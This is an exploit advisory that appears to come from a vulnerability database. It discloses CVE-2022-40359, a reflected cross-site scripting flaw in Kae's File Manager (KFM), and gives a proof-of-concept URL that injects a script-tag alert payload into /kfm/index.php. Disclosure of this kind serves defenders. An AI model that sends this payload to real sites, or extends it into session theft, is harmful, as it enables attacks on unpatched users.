KFM Kae's File Manager - ALL - Reflected Cross-Site Scripting (XSS)

2022.09.22
Risk: Low
Local: No
Remote: Yes
CWE: N/A

# Exploit Title: KFM Kae's File Manager - ALL - Reflected Cross-Site Scripting (XSS) # Exploit Author: Scott Sturrock 'ssturrock -at- protonmail -dot- com' # Vendor Homepage: https://code.google.com/archive/p/kfm/downloads # Software Link: https://code.google.com/archive/p/kfm/downloads # Version: ALL # Tested on: Linux, Windows # CVE : CVE-2022-40359 Cross site scripting (XSS) vulnerability in kfm through 1.4.7 via crafted GET request to /kfm/index.php. Visit PoC URL in browser https://{URL]/kfm/index.php/'%3CSCRIPT%3Ealert('XSS');%3C/SCRIPT%3E

References:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40359


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top